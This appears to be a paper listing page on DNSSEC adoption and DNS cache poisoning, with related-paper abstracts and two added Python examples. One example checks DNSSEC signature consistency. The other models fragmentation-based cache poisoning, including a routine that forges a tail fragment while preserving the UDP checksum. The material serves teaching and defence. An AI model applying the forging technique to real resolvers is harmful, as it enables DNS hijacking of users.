Retrofitting Security into Network Protocols: The Case of DNSSEC

Amir Herzberg and Haya Shulman. IEEE Internet Computing.

DNS Security Extensions (DNSSEC) became standardized more than 15 years ago, but its adoption is still limited. The recent publication of several new, off-path DNS cache-poisoning and wide-scale man-in-the-middle attacks should motivate DNSSEC adoption. However, significant challenges and pitfalls have resulted in severely limited deployment, which is furthermore often incorrect (and hence vulnerable). The authors outline these problems and suggest directions for improvement and further… 
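The "incorrect (and hence vulnerable)" deployments the abstract refers to are usually visible before any signature is cryptographically verified: RRSIGs that have expired or are not yet valid, RRSIGs that point at a DNSKEY the zone no longer publishes (a key removed too early during a rollover), or a signer that is not an ancestor of the owner name. The following is an added example written for this page, not the authors' code; the zone, key and signatures are constructed and the checks are the RFC 4034 bookkeeping a validator performs, with the signature verification itself left out.

```python
"""Configuration-level DNSSEC consistency checks (RFC 4034 bookkeeping).

Added example for this page, not the paper's code. Record values are constructed.
The checks cover what a validator rejects before any cryptography: validity window,
signer/owner relationship, labels count, and whether the RRSIG points at a DNSKEY
the zone actually publishes. Verifying the signature bytes needs a verifier for the
DNSKEY algorithm and is out of scope here.
"""
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class DNSKEY:
    owner: str
    flags: int        # 0x0100 = Zone Key; 0x0001 = SEP (a KSK)
    protocol: int     # must be 3
    algorithm: int    # e.g. 13 = ECDSAP256SHA256
    pubkey: bytes

@dataclass
class RRSIG:
    owner: str
    type_covered: str
    algorithm: int
    labels: int
    expiration: int   # seconds since the epoch
    inception: int
    key_tag: int
    signer: str

def key_tag(k: DNSKEY) -> int:
    """Key tag of RFC 4034 Appendix B (every algorithm except 1, RSAMD5)."""
    rdata = k.flags.to_bytes(2, "big") + bytes([k.protocol, k.algorithm]) + k.pubkey
    ac = 0
    for i, b in enumerate(rdata):
        ac += b if i & 1 else b << 8
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF

def _canon(name: str) -> str:
    return name.rstrip(".").lower()

def check_rrsig(sig: RRSIG, keys: List[DNSKEY], now: int) -> List[str]:
    """Return the misconfigurations found; an empty list means the RRSIG is consistent."""
    problems = []
    if now < sig.inception:
        problems.append("signature not yet valid")
    if now > sig.expiration:
        problems.append("signature expired")
    owner, signer = _canon(sig.owner), _canon(sig.signer)
    if not (owner == signer or owner.endswith("." + signer)):
        problems.append("signer %s is not an ancestor of %s" % (sig.signer, sig.owner))
    if sig.labels > len(owner.split(".")):
        problems.append("labels field exceeds the owner name's label count")
    matching = [k for k in keys
                if _canon(k.owner) == signer and k.protocol == 3 and k.flags & 0x0100
                and k.algorithm == sig.algorithm and key_tag(k) == sig.key_tag]
    if not matching:
        problems.append("no published zone DNSKEY matches key tag %d, algorithm %d"
                        % (sig.key_tag, sig.algorithm))
    return problems

# Constructed zone: one ZSK whose key tag works out to 1040 (0x0100 + 0x030D + 0x0001 + 0x0002).
NOW = 1_700_000_000          # fixed "current time" so the example is deterministic
DAY = 86400
ZSK = DNSKEY("example.test.", 256, 3, 13, bytes.fromhex("00010002"))
SIGS = {
    "fresh": RRSIG("www.example.test.", "A", 13, 3, NOW + DAY, NOW - DAY, 1040, "example.test."),
    "expired": RRSIG("www.example.test.", "A", 13, 3, NOW - 3600, NOW - 14 * DAY, 1040, "example.test."),
    "rolled-over": RRSIG("www.example.test.", "A", 13, 3, NOW + DAY, NOW - DAY, 1041, "example.test."),
}

def run_example() -> Dict[str, List[str]]:
    """Check each constructed RRSIG against the zone's published DNSKEY set."""
    return {name: check_rrsig(sig, [ZSK], NOW) for name, sig in SIGS.items()}

if __name__ == "__main__":
    for name, findings in run_example().items():
        print(name, "->", findings or "OK")
```

The "rolled-over" case is the one that bites in practice: the signatures are fresh and the zone is signed, yet no validating resolver can build a chain to the key, so the domain fails to resolve for exactly the users who enabled DNSSEC validation.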

DNSSEC Misconfigurations in Popular Domains

DNSSEC was designed to protect the Domain Name System (DNS) against DNS cache poisoning and domain hijacking and is expected to facilitate a multitude of future applications and systems that would use the DNS for distribution of security tokens.

POSTER: On the Resilience of DNS Infrastructure

Common configuration choices that domain operators make result in a fragile DNS infrastructure, susceptible to malicious attacks and benign failures; recommendations are provided for improving the robustness of DNS.

Fragmentation Considered Leaking: Port Inference for DNS Poisoning

Internet systems and networks have a long history of attacks by off-path adversaries that subvert the correctness and availability of Internet services; such attacks have been used, among others, for DNS cache poisoning, TCP injection and reflection DDoS attacks.

Is the Internet Ready for DNSSEC: Evaluating Pitfalls in the Naming Infrastructure

The evaluation results indicate that DNSSEC deployment is a cost-benefit decision: full adoption requires upgrading significant parts of the DNS infrastructure, including legacy infrastructure, and is hindered by a lack of protocol support.

DNS authentication as a service: preventing amplification attacks

The proposed DNS-authentication system is efficient and effectively prevents DNS-based amplification DoS attacks that abuse DNS name servers; a game-theoretic model and analysis is presented, predicting widespread adoption of the design.

Towards Security of Internet Naming Infrastructure

The experimental evaluation indicates that caching infrastructures are typically run by third parties, and that the services provided by these third parties often do not follow best practices, resulting in misconfigurations, vulnerabilities and degraded performance of the DNS servers of popular domains.

Pretty Bad Privacy: Pitfalls of DNS Encryption

This work indicates that further study may be required to adjust the end-to-end encryption proposals so that they live up to their security guarantees and suit the common server configurations in the DNS infrastructure.

DNS-IDS: Securing DNS in the Cloud Era

An anomaly-based Intrusion Detection System (IDS) for the DNS protocol (DNS-IDS) is presented; it models the normal operation of the protocol and accurately detects abnormal behavior or exploitation of the protocol.

Detection and Forensics of Domains Hijacking

This work designed and developed a system, called LUDIC (LookUp DIstributed Cache), for the detection of domain hijacking attacks; it enables forensic analysis and provides victims with signed evidence allowing them to prove breaches to third parties, such as a court of law or a resolution authority.

On the Impact of DNS Over HTTPS Paradigm on Cyber Systems

  • Kimo Bumanglag, H. Kettani
  • Computer Science
    2020 3rd International Conference on Information and Computer Technologies (ICICT)
  • 2020
The weaknesses of the DNS protocol and how malware has abused them, enhancements to DNS security, and how malware's use of DNS is detected are reviewed, with special emphasis on the effects that DNS over HTTPS may have on an organization's security.

Vulnerable Delegation of DNS Resolution

A growing number of networks delegate their DNS resolution to a trusted upstream resolver, to improve the resolvers' resilience to cache-poisoning and DoS attacks and to gain other security, performance, reliability and management advantages.

Security of Patched DNS

This work investigates the prominent patches to DNS and shows how attackers can circumvent all of them, namely the 16-bit identifier field and the other fields that the different 'patches' randomise and validate.

Measuring the Practical Impact of DNSSEC Deployment

A large-scale measurement of the effects of DNSSEC on client name resolution, using an ad network to collect results from over 500,000 geographically distributed clients, shows that enabling DNSSEC measurably increases end-to-end resolution failures, and corroborates previous researchers' finding that a relatively small fraction of users are protected by DNSSEC-validating resolvers.

Off-Path Hacking: The Illusion of Challenge-Response Authentication

Recent off-path TCP injection and DNS poisoning attacks enable attackers to circumvent existing challenge-response defenses, foil widely deployed security mechanisms, and allow a wide range of exploits, such as long-term caching of malicious objects and scripts.

Fragmentation Considered Poisonous, or:

Off-path DNS cache poisoning attacks that circumvent widely deployed challenge-response defenses, e.g., transaction identifier randomisation, port randomisation and query randomisation, are presented; the attacks exploit IP fragmentation of DNS responses.
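The reason fragmentation defeats the challenge-response defenses discussed in "Off-Path Hacking" and in the summary above is a matter of where the bytes land: the UDP header (ports, checksum) and the DNS header (TXID) are all in the first fragment, so an attacker who spoofs only the second fragment never has to guess them. The following wire-level model is an added example written for this page, not code from the paper. It constructs a genuine UDP/DNS response, fragments it, and lets an off-path attacker substitute the tail; the attacker is assumed to know the original tail bytes (the authoritative answer is public) and the 16-bit IP-ID that pairs the fragments, and the only constraint left is that the reassembled datagram's UDP checksum must still verify. Addresses are from the RFC 5737 documentation ranges; the names and the spoofed address are made up.

```python
"""Why IP fragmentation sidesteps TXID and source-port randomisation (wire-level model).

Added example for this page, not the paper's code. A genuine UDP/DNS response is
built, split into two IP fragments, and an off-path attacker replaces only the tail
fragment, which holds neither the TXID nor the resolver's source port. Constructed
assumptions: the attacker knows the original tail bytes and the IP-ID that pairs
the fragments. Addresses are from the RFC 5737 documentation ranges.
"""
import struct

SRC, DST = "192.0.2.53", "198.51.100.10"   # constructed: authoritative server -> resolver

def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum used by the UDP checksum (RFC 768, RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def ip_bytes(dotted: str) -> bytes:
    return bytes(int(x) for x in dotted.split("."))

def udp_checksum(src: str, dst: str, udp: bytes) -> int:
    """Checksum over IPv4 pseudo-header + datagram; 0 on a datagram that verifies."""
    pseudo = ip_bytes(src) + ip_bytes(dst) + struct.pack("!BBH", 0, 17, len(udp))
    return 0xFFFF ^ ones_complement_sum(pseudo + udp)

def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"

def a_record(name: str, ip: str, ttl: int) -> bytes:
    return encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + ip_bytes(ip)

def build_response(txid: int, qname: str, records) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, len(records), 0, 0)  # QR, AA set
    return header + encode_name(qname) + struct.pack("!HH", 1, 1) + b"".join(a_record(*r) for r in records)

def build_udp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    csum = udp_checksum(src, dst, udp) or 0xFFFF       # RFC 768: a computed 0 is sent as 0xFFFF
    return udp[:6] + struct.pack("!H", csum) + udp[8:]

def fragment(datagram: bytes, first_len: int):
    """Two fragments as (offset in 8-byte units, data); only the first holds the UDP header."""
    assert first_len % 8 == 0, "fragment boundaries are 8-byte aligned (RFC 791)"
    return [(0, datagram[:first_len]), (first_len // 8, datagram[first_len:])]

def forge_tail(tail: bytes, rdata_off: int, new_ip: str) -> bytes:
    """Attacker's tail: swap the A record's address at rdata_off, then re-pick the record's
    TTL low word (layout ... TTL(4) RDLENGTH(2) RDATA(4)) so the one's-complement sum of
    the tail, and hence the UDP checksum of the reassembled datagram, is unchanged."""
    out = bytearray(tail)
    old_ip_sum = sum(struct.unpack("!HH", out[rdata_off:rdata_off + 4]))
    new_ip_sum = sum(struct.unpack("!HH", ip_bytes(new_ip)))
    ttl_lo_off = rdata_off - 4
    (ttl_lo,) = struct.unpack("!H", out[ttl_lo_off:ttl_lo_off + 2])
    out[ttl_lo_off:ttl_lo_off + 2] = struct.pack("!H", (ttl_lo + old_ip_sum - new_ip_sum) % 0xFFFF)
    out[rdata_off:rdata_off + 4] = ip_bytes(new_ip)
    return bytes(out)

def read_name(msg: bytes, off: int):
    labels = []
    while msg[off]:
        labels.append(msg[off + 1:off + 1 + msg[off]].decode())
        off += 1 + msg[off]
    return ".".join(labels) + ".", off + 1

def parse_answers(dns: bytes):
    """Minimal reader for uncompressed A records in the answer section."""
    _, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", dns[:12])
    off, answers = 12, []
    for _ in range(qdcount):
        _, off = read_name(dns, off)
        off += 4
    for _ in range(ancount):
        name, off = read_name(dns, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", dns[off:off + 10])
        off += 10
        if rtype == 1:
            answers.append((name, ".".join(str(b) for b in dns[off:off + rdlen]), ttl))
        off += rdlen
    return answers

def run_demo(txid: int = 0x1F2E, sport: int = 53, dport: int = 40111) -> dict:
    qname = "example.test."
    records = [("ns1.example.test.", "192.0.2.1", 3600), ("www.example.test.", "192.0.2.80", 3600)]
    datagram = build_udp(SRC, DST, sport, dport, build_response(txid, qname, records))
    rec2_start = 8 + 12 + len(encode_name(qname)) + 4 + len(a_record(*records[0]))
    first_len = rec2_start - rec2_start % 8           # boundary just before the target record
    head, tail = (data for _, data in fragment(datagram, first_len))
    rdata_off = rec2_start - first_len + len(encode_name(records[1][0])) + 10
    poisoned = head + forge_tail(tail, rdata_off, "203.0.113.66")   # genuine head + spoofed tail
    return {
        "tail_starts_at": first_len,   # >= 20: UDP header and DNS header (TXID) are entirely in the head
        "genuine_checksum_ok": udp_checksum(SRC, DST, datagram) == 0,
        "poisoned_checksum_ok": udp_checksum(SRC, DST, poisoned) == 0,
        "answers": parse_answers(poisoned[8:]),
    }
```

Running `run_demo()` shows the resolver-side view: the reassembled datagram passes the UDP checksum, the TXID and port it was waiting on match (they came from the genuine first fragment), and the answer for www.example.test. now carries the attacker's address. Neither of the randomised fields from "Security of Patched DNS" was ever guessed; what pairs the spoofed tail with the genuine head is the IP-ID alone. A DNSSEC-validating resolver would discard the forged RRset because no RRSIG covers it, which is the motivation this paper builds on.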

Socket overloading for fun and cache-poisoning

It is shown how to apply socket overloading for DNS cache poisoning and name server pinning against popular systems that support the algorithms recommended in [RFC6056] and [RFC4097], respectively.

It's the End of the Cache as We Know It. Black Hat Conf., 2008.
